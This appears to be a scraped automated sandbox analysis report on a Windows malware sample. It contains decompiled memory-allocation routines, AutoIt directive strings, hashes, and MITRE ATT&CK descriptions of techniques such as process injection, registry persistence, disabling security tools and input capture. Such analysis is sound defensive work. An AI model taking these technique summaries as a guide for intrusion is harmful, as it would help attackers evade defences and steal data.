Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Uniqueness

Uniqueness Score: -1.00%

Function 0040151C, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x41c5d4; // 0x185a384
				while(_t29 != 0x41c5d4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x00401523
0x00401527
0x0040152e
0x00401543
0x0040154b
0x00401551
0x00401557
0x0040155a
0x0040159e
0x00401562
0x00401568
0x0040156c
0x0040156e
0x0040156e
0x00401574
0x00401576
0x00401576
0x0040157c
0x00401589
0x00401590
0x00401592
0x00401598
0x00000000
0x00401598
0x00401590
0x0040159c
0x0040159c
0x004015ad

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401589

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89

Uniqueness

Uniqueness Score: -1.00%

Function 004011E4, Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011E4() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x41c5d0 != 0) {
					L5:
					_t4 =  *0x41c5d0;
					 *0x41c5d0 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x41c5cc; // 0x1859d50
						 *_t12 = _t6;
						 *0x41c5cc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x41c5d0;
							 *0x41c5d0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x004011ee
0x0040122a
0x0040122a
0x0040122e
0x00401232
0x004011f0
0x004011f7
0x004011fc
0x00401200
0x00401207
0x0040120c
0x0040120e
0x00401214
0x00401216
0x0040121a
0x0040121a
0x00401220
0x00401222
0x00401224
0x00401225
0x00000000
0x00401202
0x00401206
0x00401206
0x00401200

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0041C5D4,00401247,?,?,00401447,?,00100000,00002000,00000004,0041C5E4,?,?), ref: 004011F7

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction ID: 1b97f869ca2ef78b7edf313f24570502d3759f43221a4d236e640dffafdc993f
Opcode Fuzzy Hash: 1d034d2b76be25e021de9249ef1b5bcb9b446cb3610b695d9b1e5c5957ac038c
Instruction Fuzzy Hash: 5FF05E727402119FD714CF69D8806A577E6EBAD315F20847ED185E77A0E635AC418B48

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00DB68DC, Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

__wcsnicmp.LIBCMT ref: 00DB6931
__wcsnicmp.LIBCMT ref: 00DB6949
__wcsnicmp.LIBCMT ref: 00DB6961
__wcsnicmp.LIBCMT ref: 00DB6979
__wcsnicmp.LIBCMT ref: 00DB6991
__wcsnicmp.LIBCMT ref: 00DB69A9
__wcsnicmp.LIBCMT ref: 00DB69C1
__wcsnicmp.LIBCMT ref: 00DB69D5
__wcsnicmp.LIBCMT ref: 00DB6A16
__wcsnicmp.LIBCMT ref: 00DB6A2A
__wcsnicmp.LIBCMT ref: 00DB6A3E
__wcsnicmp.LIBCMT ref: 00DB6A52

Strings

#comments-end, xrefs: 00DB6A38
#requireadmin, xrefs: 00DB695B
#pragma compile, xrefs: 00DB692B
Bad directive syntax error, xrefs: 00DEE31A
#ce, xrefs: 00DB6A4C
#OnAutoItStartRegister, xrefs: 00DB6973
#include-once, xrefs: 00DB698B
#comments-start, xrefs: 00DB69BB, 00DB6A10
#include, xrefs: 00DB69A3
Unterminated group of comments, xrefs: 00DEE403
Cannot parse #include, xrefs: 00DEE3F0
#cs, xrefs: 00DB69CF, 00DB6A24
#notrayicon, xrefs: 00DB6943

Memory Dump Source

Source File: 00000007.00000002.938398172.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000007.00000002.938349497.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.939279059.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.939520195.0000000000E6E000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.939540872.0000000000E72000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __wcsnicmp$_malloc
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2350238924-86951937
Opcode ID: f9db2205f0c1bcea7dd261f1461110fd1868a14340a5fa3828855b07ee80c407
Instruction ID: 1f603dd871c51acd56765b4576f1c972f49638126f3903ceb9b611691d39ea80
Opcode Fuzzy Hash: f9db2205f0c1bcea7dd261f1461110fd1868a14340a5fa3828855b07ee80c407
Instruction Fuzzy Hash: A98104B0640305FACF20BB65EC42FFE7768EF05700F084029F946AA296EB65DA55D6B1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report CVbJSUXraQ

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Function 00DC09D0, Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300
windowsleeptimeCOMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre